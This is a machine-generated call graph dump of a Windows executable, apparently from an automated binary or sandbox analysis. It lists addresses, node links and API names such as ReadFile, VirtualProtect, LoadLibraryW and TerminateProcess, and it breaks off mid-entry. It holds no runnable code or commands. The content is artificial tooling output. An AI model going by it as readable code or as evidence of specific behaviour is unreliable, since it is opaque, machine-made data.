__getptd_noexit 86066->86115 86117 417f36 67 API calls __getptd_noexit 86068->86117 86070 41efed 86116 417f23 67 API calls __getptd_noexit 86070->86116 86071 41f016 86118 417f23 67 API calls __getptd_noexit 86071->86118 86095 41ba3b 86072->86095 86076 41f01d 86119 417ebb 6 API calls 2 library calls 86076->86119 86077 41f058 86079 41f065 86077->86079 86080 41f07b 86077->86080 86105 41ef5f 86079->86105 86120 417f23 67 API calls __getptd_noexit 86080->86120 86081 41eff5 ___lock_fhandle 86081->86024 86084 41f080 86121 417f36 67 API calls __getptd_noexit 86084->86121 86085 41f073 86122 41f0a6 LeaveCriticalSection __unlock_fhandle 86085->86122 86088->86024 86089->86039 86091->86050 86092->86052 86093->86061 86096 41ba47 ___lock_fhandle 86095->86096 86097 41baa2 86096->86097 86100 418407 __lock 67 API calls 86096->86100 86098 41bac4 ___lock_fhandle 86097->86098 86099 41baa7 EnterCriticalSection 86097->86099 86098->86077 86099->86098 86101 41ba73 86100->86101 86102 41ba8a 86101->86102 86104 4189e6 ___lock_fhandle InitializeCriticalSectionAndSpinCount 86101->86104 86103 41bad2 ___lock_fhandle LeaveCriticalSection 86102->86103 86103->86097 86104->86102 86106 41b9c4 __close_nolock 67 API calls 86105->86106 86107 41ef6e 86106->86107 86108 41ef84 SetFilePointer 86107->86108 86109 41ef74 86107->86109 86110 41ef9b GetLastError 86108->86110 86113 41efa3 86108->86113 86111 417f23 __swprintf 67 API calls 86109->86111 86110->86113 86112 41ef79 86111->86112 86112->86085 86113->86112 86114 417f49 __dosmaperr 67 API calls 86113->86114 86114->86112 86115->86070 86116->86081 86117->86071 86118->86076 86120->86084 86121->86085 86122->86081 86124 414e31 86123->86124 86125 414e4d 86123->86125 86169 417f23 67 API calls __getptd_noexit 86124->86169 86127 41486c __flush 101 API calls 86125->86127 86132 414e46 86125->86132 86129 414e59 86127->86129 86128 414e36 86170 417ebb 6 API calls 2 library calls 86128->86170 86142 41e680 86129->86142 86141 414f08 LeaveCriticalSection LeaveCriticalSection _ftell 86132->86141 86134 41453a __fileno 67 API calls 86135 414e67 86134->86135 86146 41e5b3 86135->86146 86137 414e6d 86137->86132 86138 413a88 ___crtsetenv 67 API calls 86137->86138 86138->86132 86139->85871 86141->85876 86143 414e61 86142->86143 86144 41e690 86142->86144 86143->86134 86144->86143 86145 413a88 ___crtsetenv 67 API calls 86144->86145 86145->86143 86147 41e5bf ___lock_fhandle 86146->86147 86148 41e5c7 86147->86148 86150 41e5e2 86147->86150 86186 417f36 67 API calls __getptd_noexit 86148->86186 86149 41e5f0 86188 417f36 67 API calls __getptd_noexit 86149->86188 86150->86149 86155 41e631 86150->86155 86153 41e5cc 86187 417f23 67 API calls __getptd_noexit 86153->86187 86154 41e5f5 86189 417f23 67 API calls __getptd_noexit 86154->86189 86158 41ba3b ___lock_fhandle 68 API calls 86155->86158 86160 41e637 86158->86160 86159 41e5fc 86190 417ebb 6 API calls 2 library calls 86159->86190 86162 41e652 86160->86162 86163 41e644 86160->86163 86191 417f23 67 API calls __getptd_noexit 86162->86191 86171 41e517 86163->86171 86165 41e5d4 ___lock_fhandle 86165->86137 86167 41e64c 86192 41e676 LeaveCriticalSection __unlock_fhandle 86167->86192 86169->86128 86193 41b9c4 86171->86193 86173 41e57d 86206 41b93e 68 API calls 2 library calls 86173->86206 86175 41e527 86175->86173 86176 41e55b 86175->86176 86178 41b9c4 __close_nolock 67 API calls 86175->86178 86176->86173 86179 41b9c4 __close_nolock 67 API calls 86176->86179 86177 41e585 86180 41e5a7 86177->86180 86207 417f49 67 API calls 3 library calls 86177->86207 86181 41e552 86178->86181 86182 41e567 CloseHandle 86179->86182 86180->86167 86184 41b9c4 __close_nolock 67 API calls 86181->86184 86182->86173 86185 41e573 GetLastError 86182->86185 86184->86176 86185->86173 86186->86153 86187->86165 86188->86154 86189->86159 86191->86167 86192->86165 86194 41b9d1 86193->86194 86197 41b9e9 86193->86197 86195 417f36 __free_osfhnd 67 API calls 86194->86195 86196 41b9d6 86195->86196 86199 417f23 __swprintf 67 API calls 86196->86199 86198 417f36 __free_osfhnd 67 API calls 86197->86198 86200 41ba2e 86197->86200 86201 41ba17 86198->86201 86203 41b9de 86199->86203 86200->86175 86202 417f23 __swprintf 67 API calls 86201->86202 86204 41ba1e 86202->86204 86203->86175 86205 417ebb __swprintf 6 API calls 86204->86205 86205->86200 86206->86177 86207->86180 86209 415126 ___lock_fhandle 86208->86209 86210 41513a _memset 86209->86210 86211 41516f 86209->86211 86212 415164 ___lock_fhandle 86209->86212 86237 417f23 67 API calls __getptd_noexit 86210->86237 86213 415965 __lock_file 68 API calls 86211->86213 86212->85881 86214 415177 86213->86214 86221 414f10 86214->86221 86217 415154 86238 417ebb 6 API calls 2 library calls 86217->86238 86223 414f2e _memset 86221->86223 86227 414f4c 86221->86227 86222 414f37 86290 417f23 67 API calls __getptd_noexit 86222->86290 86223->86222 86223->86227 86233 414f8b 86223->86233 86225 414f3c 86291 417ebb 6 API calls 2 library calls 86225->86291 86239 4151a6 LeaveCriticalSection LeaveCriticalSection _ftell 86227->86239 86229 4150d5 _memset 86294 417f23 67 API calls __getptd_noexit 86229->86294 86230 4150a9 _memset 86293 417f23 67 API calls __getptd_noexit 86230->86293 86231 41453a __fileno 67 API calls 86231->86233 86233->86227 86233->86229 86233->86230 86233->86231 86240 41ed9e 86233->86240 86270 41e6b1 86233->86270 86292 41ee9b 67 API calls 3 library calls 86233->86292 86237->86217 86239->86212 86241 41edaa ___lock_fhandle 86240->86241 86242 41edb2 86241->86242 86243 41edcd 86241->86243 86364 417f36 67 API calls __getptd_noexit 86242->86364 86245 41eddb 86243->86245 86248 41ee1c 86243->86248 86366 417f36 67 API calls __getptd_noexit 86245->86366 86246 41edb7 86365 417f23 67 API calls __getptd_noexit 86246->86365 86251 41ee29 86248->86251 86252 41ee3d 86248->86252 86250 41ede0 86367 417f23 67 API calls __getptd_noexit 86250->86367 86369 417f36 67 API calls __getptd_noexit 86251->86369 86255 41ba3b ___lock_fhandle 68 API calls 86252->86255 86258 41ee43 86255->86258 86256 41ee2e 86370 417f23 67 API calls __getptd_noexit 86256->86370 86257 41edbf ___lock_fhandle 86257->86233 86262 41ee50 86258->86262 86263 41ee66 86258->86263 86259 41ede7 86368 417ebb 6 API calls 2 library calls 86259->86368 86295 41e7dc 86262->86295 86371 417f23 67 API calls __getptd_noexit 86263->86371 86266 41ee6b 86372 417f36 67 API calls __getptd_noexit 86266->86372 86267 41ee5e 86373 41ee91 LeaveCriticalSection __unlock_fhandle 86267->86373 86271 41e6c1 86270->86271 86275 41e6de 86270->86275 86377 417f23 67 API calls __getptd_noexit 86271->86377 86273 41e6c6 86378 417ebb 6 API calls 2 library calls 86273->86378 86276 41e713 86275->86276 86282 41e6d6 86275->86282 86374 423600 86275->86374 86278 41453a __fileno 67 API calls 86276->86278 86279 41e727 86278->86279 86280 41ed9e __read 79 API calls 86279->86280 86281 41e72e 86280->86281 86281->86282 86283 41453a __fileno 67 API calls 86281->86283 86282->86233 86284 41e751 86283->86284 86284->86282 86285 41453a __fileno 67 API calls 86284->86285 86286 41e75d 86285->86286 86286->86282 86287 41453a __fileno 67 API calls 86286->86287 86288 41e769 86287->86288 86289 41453a __fileno 67 API calls 86288->86289 86289->86282 86290->86225 86292->86233 86293->86225 86294->86225 86296 41e813 86295->86296 86297 41e7f8 86295->86297 86299 41e822 86296->86299 86301 41e849 86296->86301 86298 417f36 __free_osfhnd 67 API calls 86297->86298 86300 41e7fd 86298->86300 86302 417f36 __free_osfhnd 67 API calls 86299->86302 86304 417f23 __swprintf 67 API calls 86300->86304 86303 41e868 86301->86303 86318 41e87c 86301->86318 86305 41e827 86302->86305 86306 417f36 __free_osfhnd 67 API calls 86303->86306 86307 41e805 86304->86307 86309 417f23 __swprintf 67 API calls 86305->86309 86311 41e86d 86306->86311 86307->86267 86308 41e8d4 86310 417f36 __free_osfhnd 67 API calls 86308->86310 86312 41e82e 86309->86312 86313 41e8d9 86310->86313 86314 417f23 __swprintf 67 API calls 86311->86314 86315 417ebb __swprintf 6 API calls 86312->86315 86316 417f23 __swprintf 67 API calls 86313->86316 86317 41e874 86314->86317 86315->86307 86316->86317 86321 417ebb __swprintf 6 API calls 86317->86321 86318->86307 86318->86308 86319 41e8b0 86318->86319 86320 41e8f5 86318->86320 86319->86308 86322 41e8bb ReadFile 86319->86322 86324 416fb6 __malloc_crt 67 API calls 86320->86324 86321->86307 86325 41ed62 GetLastError 86322->86325 86326 41e9e7 86322->86326 86327 41e90b 86324->86327 86328 41ed6f 86325->86328 86331 41ebe8 86325->86331 86326->86325 86332 41e9fb 86326->86332 86329 41e931 86327->86329 86330 41e913 86327->86330 86334 417f23 __swprintf 67 API calls 86328->86334 86333 423462 __lseeki64_nolock 69 API calls 86329->86333 86335 417f23 __swprintf 67 API calls 86330->86335 86336 417f49 __dosmaperr 67 API calls 86331->86336 86343 41eb6d 86331->86343 86332->86343 86345 41ec2d 86332->86345 86346 41ea17 86332->86346 86338 41e93d 86333->86338 86339 41ed74 86334->86339 86337 41e918 86335->86337 86336->86343 86340 417f36 __free_osfhnd 67 API calls 86337->86340 86338->86322 86341 417f36 __free_osfhnd 67 API calls 86339->86341 86340->86307 86341->86343 86342 413a88 ___crtsetenv 67 API calls 86342->86307 86343->86307 86343->86342 86344 41eca5 ReadFile 86349 41ecc4 GetLastError 86344->86349 86357 41ecce 86344->86357 86345->86343 86345->86344 86347 41ea7d ReadFile 86346->86347 86352 41eafa 86346->86352 86348 41ea9b GetLastError 86347->86348 86356 41eaa5 86347->86356 86348->86346 86348->86356 86349->86345 86349->86357 86350 41ebbe MultiByteToWideChar 86350->86343 86351 41ebe2 GetLastError 86350->86351 86351->86331 86352->86343 86353 41eb75 86352->86353 86354 41eb68 86352->86354 86359 41eb32 86352->86359 86353->86359 86360 41ebac 86353->86360 86355 417f23 __swprintf 67 API calls 86354->86355 86355->86343 86356->86346 86361 423462 __lseeki64_nolock 69 API calls 86356->86361 86357->86345 86358 423462 __lseeki64_nolock 69 API calls 86357->86358 86358->86357 86359->86350 86362 423462 __lseeki64_nolock 69 API calls 86360->86362 86361->86356 86363 41ebbb 86362->86363 86363->86350 86364->86246 86365->86257 86366->86250 86367->86259 86369->86256 86370->86259 86371->86266 86372->86267 86373->86257 86375 416fb6 __malloc_crt 67 API calls 86374->86375 86376 423615 86375->86376 86376->86276 86377->86273 86382 414cef GetSystemTimeAsFileTime __aulldiv 86379->86382 86381 4431ef 86381->85884 86382->86381 86383->85892 86385->85897 86390 4523e1 _wcscpy 86386->86390 86387 4151b0 81 API calls __fread_nolock 86387->86390 86388 44afdc GetSystemTimeAsFileTime 86388->86390 86389 452553 86389->85806 86389->85807 86390->86387 86390->86388 86390->86389 86391 41557c 105 API calls _fseek 86390->86391 86391->86390 86393 44b1b4 86392->86393 86394 44b1a6 86392->86394 86396 44b1ca 86393->86396 86397 44b1c2 86393->86397 86398 414e06 138 API calls 86393->86398 86395 414e06 138 API calls 86394->86395 86395->86393 86427 4352d1 81 API calls 2 library calls 86396->86427 86397->85833 86400 44b2c1 86398->86400 86400->86396 86402 44b2cf 86400->86402 86401 44b20d 86403 44b211 86401->86403 86404 44b23b 86401->86404 86405 44b2dc 86402->86405 86407 414e94 __fcloseall 106 API calls 86402->86407 86406 44b21e 86403->86406 86410 414e94 __fcloseall 106 API calls 86403->86410 86428 43526e 86404->86428 86405->85833 86413 414e94 __fcloseall 106 API calls 86406->86413 86415 44b22e 86406->86415 86407->86405 86409 44b242 86411 44b270 86409->86411 86412 44b248 86409->86412 86410->86406 86438 44b0af 111 API calls 86411->86438 86416 414e94 __fcloseall 106 API calls 86412->86416 86417 44b255 86412->86417 86413->86415 86415->85833 86416->86417 86418 44b265 86417->86418 86420 414e94 __fcloseall 106 API calls 86417->86420 86418->85833 86419 44b276 86439 43522c 67 API calls ___crtsetenv 86419->86439 86420->86418 86422 44b27c 86423 44b289 86422->86423 86424 414e94 __fcloseall 106 API calls 86422->86424 86425 44b299 86423->86425 86426 414e94 __fcloseall 106 API calls 86423->86426 86424->86423 86425->85833 86426->86425 86427->86401 86429 4138ba _malloc 67 API calls 86428->86429 86430 43527d 86429->86430 86431 4138ba _malloc 67 API calls 86430->86431 86432 43528d 86431->86432 86433 4138ba _malloc 67 API calls 86432->86433 86434 43529d 86433->86434 86436 4352bc 86434->86436 86440 43522c 67 API calls ___crtsetenv 86434->86440 86436->86409 86437 4352c8 86437->86409 86438->86419 86439->86422 86440->86437 86441->85722 86442->85723 86443->85743 86444->85743 86445->85743 86446->85737 86447->85743 86448->85743 86449->85747 86450->85757 86452->85756 86454 40e7fc 86453->86454 86455 40e8f9 86453->86455 86454->85765 86454->85768 86456 4092c0 VariantClear 86455->86456 86457 40e8fe 86456->86457 86458 41171a 75 API calls 86457->86458 86458->86454 86460 40e306 86459->86460 86462 40e33e moneypunct 86459->86462 86460->86462 86463 40e2e0 VariantClear moneypunct 86460->86463 86462->85765 86463->86460 86464->85647 86466 410148 SHGetDesktopFolder 86465->86466 86469 4101a3 _wcscpy 86465->86469 86467 41015a _wcscpy 86466->86467 86466->86469 86468 41018a SHGetPathFromIDListW 86467->86468 86467->86469 86468->86469 86469->85651 86470->85653 86472 40f5e0 152 API calls 86471->86472 86473 40f417 86472->86473 86474 42ca37 86473->86474 86475 40f42c 86473->86475 86476 42ca1f 86473->86476 86477 452574 140 API calls 86474->86477 86512 4037e0 139 API calls 7 library calls 86475->86512 86513 43717f 110 API calls _printf 86476->86513 86480 42ca50 86477->86480 86483 42ca76 86480->86483 86484 42ca54 86480->86484 86481 40f446 86481->85650 86482 42ca2d 86482->86474 86485 41171a 75 API calls 86483->86485 86486 434fe1 106 API calls 86484->86486 86492 42cacc moneypunct 86485->86492 86487 42ca5e 86486->86487 86514 43717f 110 API calls _printf 86487->86514 86489 42ccc3 86491 413a88 ___crtsetenv 67 API calls 86489->86491 86490 42ca6c 86490->86483 86493 42cccd 86491->86493 86492->86489 86499 401b70 75 API calls 86492->86499 86502 445051 86492->86502 86505 402cc0 75 API calls 2 library calls 86492->86505 86506 4026a0 86492->86506 86515 44c80c 87 API calls 3 library calls 86492->86515 86516 44b408 75 API calls 86492->86516 86494 434fe1 106 API calls 86493->86494 86495 42ccda 86494->86495 86499->86492 86503 41171a 75 API calls 86502->86503 86504 445080 _realloc 86503->86504 86504->86492 86504->86504 86505->86492 86507 4026af 86506->86507 86509 40276b 86506->86509 86508 41171a 75 API calls 86507->86508 86507->86509 86510 4026ee moneypunct 86507->86510 86508->86510 86509->86492 86510->86509 86511 41171a 75 API calls 86510->86511 86511->86510 86512->86481 86513->86482 86514->86490 86515->86492 86516->86492 86517->85660 86518->85661 86519->85667 86520 431914 86521 431920 86520->86521 86522 431928 86521->86522 86523 43193d 86521->86523 86729 45e62e 116 API calls 3 library calls 86522->86729 86730 47f2b4 174 API calls 86523->86730 86526 43194a 86536 4095b0 moneypunct 86526->86536 86731 45e62e 116 API calls 3 library calls 86526->86731 86527 409708 86530 4097af 86530->86527 86715 40d590 VariantClear 86530->86715 86532 4315b8 WaitForSingleObject 86534 4315d6 GetExitCodeProcess CloseHandle 86532->86534 86532->86536 86720 40d590 VariantClear 86534->86720 86535 431623 Sleep 86538 43163b timeGetTime 86535->86538 86545 409894 86535->86545 86536->86527 86536->86530 86536->86532 86536->86535 86541 40986e Sleep 86536->86541 86543 4098f1 TranslateMessage DispatchMessageW 86536->86543 86536->86545 86558 45e62e 116 API calls 86536->86558 86563 4092c0 VariantClear 86536->86563 86564 4319c9 VariantClear 86536->86564 86566 409030 86536->86566 86580 40d300 86536->86580 86585 40d320 86536->86585 86591 40b380 119 API calls moneypunct 86536->86591 86592 409a40 86536->86592 86716 409340 174 API calls moneypunct 86536->86716 86732 40e380 VariantClear moneypunct 86536->86732 86538->86545 86544 409880 timeGetTime 86541->86544 86541->86545 86543->86536 86544->86545 86545->86536 86546 431673 CloseHandle 86545->86546 86547 43170c GetExitCodeProcess CloseHandle 86545->86547 86548 46dd22 133 API calls 86545->86548 86550 46e641 134 API calls 86545->86550 86553 431781 Sleep 86545->86553 86557 40d590 VariantClear 86545->86557 86562 4092c0 VariantClear 86545->86562 86717 447e59 75 API calls 86545->86717 86718 453b07 77 API calls 86545->86718 86719 4646a2 76 API calls 86545->86719 86721 444233 88 API calls _wcslen 86545->86721 86722 457509 VariantClear 86545->86722 86723 404120 86545->86723 86727 4717e3 VariantClear 86545->86727 86728 436272 6 API calls 86545->86728 86546->86545 86547->86545 86548->86545 86550->86545 86553->86536 86557->86545 86558->86536 86562->86545 86563->86536 86564->86536 86733 409110 117 API calls 86566->86733 86568 42ceb6 86743 410ae0 VariantClear moneypunct 86568->86743 86570 42cebf 86571 40906e 86571->86568 86572 42cea9 86571->86572 86574 4090a4 86571->86574 86742 45e62e 116 API calls 3 library calls 86572->86742 86734 404160 86574->86734 86577 4090f0 moneypunct 86577->86536 86578 4092c0 VariantClear 86579 4090be moneypunct 86578->86579 86579->86577 86579->86578 86582 4292e3 86580->86582 86584 40d30c 86580->86584 86581 429323 86581->86536 86582->86581 86583 4292fd TranslateAcceleratorW 86582->86583 86583->86584 86584->86536 86586 4296d0 86585->86586 86589 40d32f 86585->86589 86586->86536 86587 40d33c 86587->86536 86588 42972a IsDialogMessageW 86588->86587 86588->86589 86589->86587 86589->86588 86919 4340ec GetClassLongW 86589->86919 86591->86536 86593 409a66 _wcslen 86592->86593 86594 41171a 75 API calls 86593->86594 86652 40aade moneypunct _realloc 86593->86652 86595 409a9c _realloc 86594->86595 86596 41171a 75 API calls 86595->86596 86598 409abd 86596->86598 86597 401380 75 API calls 86599 42cee9 86597->86599 86600 409aeb CharUpperBuffW 86598->86600 86603 409b09 moneypunct 86598->86603 86598->86652 86601 41171a 75 API calls 86599->86601 86600->86603 86609 42cf10 _realloc 86601->86609 86641 409b88 moneypunct 86603->86641 86921 47d10e 150 API calls 86603->86921 86605 4092c0 VariantClear 86606 42e5e0 86605->86606 86951 410ae0 VariantClear moneypunct 86606->86951 86608 42e5f2 86950 45e62e 116 API calls 3 library calls 86609->86950 86610 409e4a 86610->86609 86612 41171a 75 API calls 86610->86612 86617 409ea4 86610->86617 86611 40aa5b 86614 41171a 75 API calls 86611->86614 86612->86617 86613 41171a 75 API calls 86613->86641 86634 40aa81 moneypunct _realloc 86614->86634 86615 409ed0 86619 42d50d 86615->86619 86658 409ef8 moneypunct _realloc 86615->86658 86930 40b800 VariantClear VariantClear moneypunct 86615->86930 86616 40c3e0 75 API calls 86616->86641 86617->86615 86618 41171a 75 API calls 86617->86618 86620 42d480 86618->86620 86621 42d527 86619->86621 86931 40b800 VariantClear VariantClear moneypunct 86619->86931 86624 42d491 86620->86624 86926 44b3f6 75 API calls 86620->86926 86621->86658 86932 40e2e0 VariantClear moneypunct 86621->86932 86622 42d195 VariantClear 86622->86641 86927 40df50 75 API calls 86624->86927 86625 40a415 86631 41171a 75 API calls 86625->86631 86626 42db5c 86936 4721e5 VariantClear 86626->86936 86627 4092c0 VariantClear 86627->86641 86648 40a41c 86631->86648 86640 41171a 75 API calls 86634->86640 86636 42d4a6 86928 4530b3 75 API calls 86636->86928 86638 42db96 86937 45e62e 116 API calls 3 library calls 86638->86937 86640->86652 86641->86609 86641->86610 86641->86611 86641->86613 86641->86616 86641->86622 86641->86627 86641->86634 86642 42d128 86641->86642 86646 42d20c 86641->86646 86654 42dbb9 86641->86654 86922 40c620 118 API calls 86641->86922 86924 40be00 75 API calls 2 library calls 86641->86924 86925 40e380 VariantClear moneypunct 86641->86925 86644 4092c0 VariantClear 86642->86644 86647 42d131 86644->86647 86645 42d4d7 86929 4530b3 75 API calls 86645->86929 86646->86536 86923 410ae0 VariantClear moneypunct 86647->86923 86662 40a481 86648->86662 86938 40c8a0 VariantClear moneypunct 86648->86938 86652->86597 86654->86605 86656 44b3f6 75 API calls 86656->86658 86658->86626 86658->86638 86658->86652 86658->86656 86661 411421 74 API calls __cinit 86658->86661 86663 402cc0 75 API calls 86658->86663 86664 41171a 75 API calls 86658->86664 86670 4019e0 76 API calls 86658->86670 86676 40a3a7 86658->86676 86680 40a053 86658->86680 86933 45ee98 75 API calls 86658->86933 86934 404260 76 API calls 86658->86934 86935 409210 VariantClear 86658->86935 86659 40aa22 moneypunct 86659->86536 86660 4092c0 VariantClear 86691 40a534 moneypunct _realloc 86660->86691 86661->86658 86665 42dc1e VariantClear 86662->86665 86666 40a4ed 86662->86666 86662->86691 86663->86658 86664->86658 86673 40a4ff moneypunct 86665->86673 86666->86673 86939 40e380 VariantClear moneypunct 86666->86939 86669 41171a 75 API calls 86669->86691 86670->86658 86673->86669 86673->86691 86674 42deb6 VariantClear 86674->86691 86675 40a73c 86677 42e237 86675->86677 86684 40a76b 86675->86684 86676->86625 86676->86626 86943 46e709 VariantClear VariantClear moneypunct 86677->86943 86678 42dfe9 VariantClear 86678->86691 86679 42df47 VariantClear 86679->86691 86680->86536 86682 40a7a2 86697 40a7ad moneypunct 86682->86697 86944 40b800 VariantClear VariantClear moneypunct 86682->86944 86683 40e380 VariantClear 86683->86691 86684->86682 86708 40a800 moneypunct 86684->86708 86920 40b800 VariantClear VariantClear moneypunct 86684->86920 86687 41171a 75 API calls 86687->86691 86688 40a8b0 86702 40a8c2 moneypunct 86688->86702 86946 40e380 VariantClear moneypunct 86688->86946 86689 42e312 86692 42e337 VariantClear 86689->86692 86689->86702 86690 41171a 75 API calls 86693 42dd10 VariantInit VariantCopy 86690->86693 86691->86660 86691->86674 86691->86675 86691->86677 86691->86678 86691->86679 86691->86683 86691->86687 86691->86690 86940 46e9cd 75 API calls 86691->86940 86941 409210 VariantClear 86691->86941 86942 44cc6c VariantClear moneypunct 86691->86942 86692->86702 86693->86691 86695 42dd30 VariantClear 86693->86695 86694 42e3b2 86703 42e3da VariantClear 86694->86703 86709 40a91a moneypunct 86694->86709 86695->86691 86698 40a7ee 86697->86698 86701 42e2a7 VariantClear 86697->86701 86697->86708 86698->86708 86945 40e380 VariantClear moneypunct 86698->86945 86699 40a908 86699->86709 86947 40e380 VariantClear moneypunct 86699->86947 86701->86708 86702->86694 86702->86699 86703->86709 86704 42e47f 86710 42e4a3 VariantClear 86704->86710 86714 40a957 moneypunct 86704->86714 86706 40a945 86706->86714 86948 40e380 VariantClear moneypunct 86706->86948 86708->86688 86708->86689 86709->86704 86709->86706 86710->86714 86712 42e559 VariantClear 86712->86714 86714->86659 86714->86712 86949 40e380 VariantClear moneypunct 86714->86949 86715->86527 86716->86536 86717->86545 86718->86545 86719->86545 86720->86545 86721->86545 86722->86545 86724 40412e 86723->86724 86725 4092c0 VariantClear 86724->86725 86726 404138 86725->86726 86726->86553 86727->86545 86728->86545 86729->86536 86730->86526 86731->86536 86732->86536 86733->86571 86735 4092c0 VariantClear 86734->86735 86736 40416e 86735->86736 86737 404120 VariantClear 86736->86737 86738 40419b 86737->86738 86744 4734b7 86738->86744 86788 480df5 86738->86788 86739 4041c6 86739->86568 86739->86579 86742->86568 86743->86570 86796 453063 86744->86796 86747 473545 86800 463c42 86747->86800 86748 47350c 86749 4092c0 VariantClear 86748->86749 86756 473514 86749->86756 86751 473558 86752 47355c 86751->86752 86769 473595 86751->86769 86754 4092c0 VariantClear 86752->86754 86753 473616 86813 463d7e 86753->86813 86763 473564 86754->86763 86756->86739 86757 473622 86759 473697 86757->86759 86760 47362c 86757->86760 86758 453063 111 API calls 86758->86769 86847 457838 86759->86847 86762 4092c0 VariantClear 86760->86762 86766 473634 86762->86766 86763->86739 86766->86739 86768 473655 86771 4092c0 VariantClear 86768->86771 86769->86753 86769->86758 86769->86768 86859 462f5a 87 API calls __wcsicoll 86769->86859 86784 47365d 86771->86784 86772 4736b0 86860 45e62e 116 API calls 3 library calls 86772->86860 86773 4736c9 86775 40e7e0 76 API calls 86773->86775 86777 4736db 86775->86777 86776 4736ba GetCurrentProcess TerminateProcess 86776->86773 86778 4736ff 86777->86778 86861 40d030 76 API calls 86777->86861 86782 473731 86778->86782 86863 40d030 76 API calls 86778->86863 86864 46b945 134 API calls 2 library calls 86778->86864 86780 4736f1 86862 46b945 134 API calls 2 library calls 86780->86862 86785 473744 FreeLibrary 86782->86785 86786 47374b 86782->86786 86784->86739 86785->86786 86786->86739 86789 453081 111 API calls 86788->86789 86790 480e33 86789->86790 86880 402dd0 86790->86880 86792 480e3b 86794 480e65 86792->86794 86909 40e6d0 76 API calls 86792->86909 86794->86739 86795 480e9f 86795->86739 86797 45306e 86796->86797 86798 45307a 86796->86798 86797->86798 86865 452e2a 111 API calls 5 library calls 86797->86865 86798->86747 86798->86748 86866 45335b 76 API calls 86800->86866 86802 463c5d 86867 442c52 80 API calls _wcslen 86802->86867 86804 463c72 86806 40c060 75 API calls 86804->86806 86812 463cac 86804->86812 86807 463c8e 86806->86807 86868 4608ce 75 API calls _realloc 86807->86868 86809 463ca4 86810 40c740 75 API calls 86809->86810 86810->86812 86811 463cf7 86811->86751 86812->86811 86869 462f5a 87 API calls __wcsicoll 86812->86869 86814 453063 111 API calls 86813->86814 86815 463d99 86814->86815 86816 463de0 86815->86816 86817 463dca 86815->86817 86870 40c760 78 API calls 86816->86870 86818 453081 111 API calls 86817->86818 86820 463dd0 LoadLibraryW 86818->86820 86822 463e09 86820->86822 86821 463de7 86826 463e19 86821->86826 86871 40c760 78 API calls 86821->86871 86824 463e3e 86822->86824 86822->86826 86828 463e4e 86824->86828 86829 463e7b 86824->86829 86825 463dfb 86825->86826 86872 40c760 78 API calls 86825->86872 86826->86757 86873 40d500 75 API calls 86828->86873 86875 40c760 78 API calls 86829->86875 86832 463e57 86874 45efe7 77 API calls moneypunct 86832->86874 86833 463e82 GetProcAddress 86836 463e90 86833->86836 86835 463e62 GetProcAddress 86837 463e79 86835->86837 86836->86826 86836->86837 86838 463edf 86836->86838 86837->86836 86876 403470 75 API calls _realloc 86837->86876 86838->86826 86840 463eef FreeLibrary 86838->86840 86840->86826 86841 463eb4 86877 40d500 75 API calls 86841->86877 86843 463ebd 86878 45efe7 77 API calls moneypunct 86843->86878 86845 463ec8 GetProcAddress 86879 401330 moneypunct 86845->86879 86848 457a4c 86847->86848 86849 45785f _strcat moneypunct _wcslen _wcscpy 86847->86849 86855 410d40 86848->86855 86849->86848 86850 443576 78 API calls 86849->86850 86851 40c760 78 API calls 86849->86851 86852 453081 111 API calls 86849->86852 86853 4138ba 67 API calls _malloc 86849->86853 86854 40f580 77 API calls 86849->86854 86850->86849 86851->86849 86852->86849 86853->86849 86854->86849 86857 410d55 86855->86857 86856 410ded VirtualProtect 86858 410dbb 86856->86858 86857->86856 86857->86858 86858->86772 86858->86773 86859->86769 86860->86776 86861->86780 86862->86778 86863->86778 86864->86778 86865->86798 86866->86802 86867->86804 86868->86809 86869->86811 86870->86821 86871->86825 86872->86822 86873->86832 86874->86835 86875->86833 86876->86841 86877->86843 86878->86845 86879->86838 86881 41171a 75 API calls 86880->86881 86882 402e03 86881->86882 86883 41171a 75 API calls 86882->86883 86907 402e16 moneypunct 86883->86907 86885 403094 moneypunct 86885->86792 86887 403770 75 API calls 86887->86907 86888 40305a moneypunct 86911 402cc0 75 API calls 2 library calls 86888->86911 86890 42b5fe 86915 45ffa9 118 API calls 3 library calls 86890->86915 86891 403470 75 API calls 86891->86907 86893 42b5c3 86914 45ffa9 118 API calls 3 library calls 86893->86914 86894 42b612 86894->86885 86916 45ffa9 118 API calls 3 library calls 86894->86916 86898 402cc0 75 API calls 86898->86907 86899 42b68a 86918 402cc0 75 API calls 2 library calls 86899->86918 86900 42b655 86908 42b5e1 86900->86908 86917 402cc0 75 API calls 2 library calls 86900->86917 86901 402650 75 API calls 86901->86907 86902 402ae0 75 API calls 86903 402ff0 CharUpperBuffW 86902->86903 86903->86907 86906 41171a 75 API calls 86906->86907 86907->86887 86907->86888 86907->86890 86907->86891 86907->86893 86907->86894 86907->86898 86907->86899 86907->86901 86907->86902 86907->86906 86910 4035d0 86 API calls 86907->86910 86912 402b70 76 API calls 86907->86912 86913 403530 118 API calls _realloc 86907->86913 86908->86885 86909->86795 86910->86907 86911->86885 86912->86907 86913->86907 86914->86908 86915->86894 86916->86900 86917->86908 86918->86885 86919->86589 86920->86682 86921->86603 86922->86641 86923->86659 86924->86641 86925->86641 86926->86624 86927->86636 86928->86645 86929->86615 86930->86619 86931->86621 86932->86658 86933->86658 86934->86658 86935->86658 86936->86638 86937->86654 86938->86648 86939->86673 86940->86691 86941->86691 86942->86691 86943->86682 86944->86697 86945->86708 86946->86702 86947->86709 86948->86714 86949->86714 86950->86654 86951->86608 86952 42919b 86957 40ef10 86952->86957 86955 411421 __cinit 74 API calls 86956 4291aa 86955->86956 86958 41171a 75 API calls 86957->86958 86959 40ef17 86958->86959 86960 42ad48 86959->86960 86965 40ef40 74 API calls __cinit 86959->86965 86962 40ef2a 86966 40e470 86962->86966 86965->86962 86967 40c060 75 API calls 86966->86967 86968 40e483 GetVersionExW 86967->86968 86969 4021e0 75 API calls 86968->86969 86970 40e4bb 86969->86970 86992 40e600 86970->86992 86975 42accc 86978 42ad28 GetSystemInfo 86975->86978 86982 42ad38 GetSystemInfo 86978->86982 86979 40e557 GetCurrentProcess 87012 40ee30 LoadLibraryA GetProcAddress 86979->87012 86980 40e56c 86980->86982 87005 40eee0 86980->87005 86985 40e5c9 87009 40eea0 86985->87009 86988 40e5e0 86990 40e5f1 FreeLibrary 86988->86990 86991 40e5f4 86988->86991 86989 40e5dd FreeLibrary 86989->86988 86990->86991 86991->86955 86993 40e60b 86992->86993 86994 40c740 75 API calls 86993->86994 86995 40e4c2 86994->86995 86996 40e620 86995->86996 86997 40e62a 86996->86997 86998 42ac93 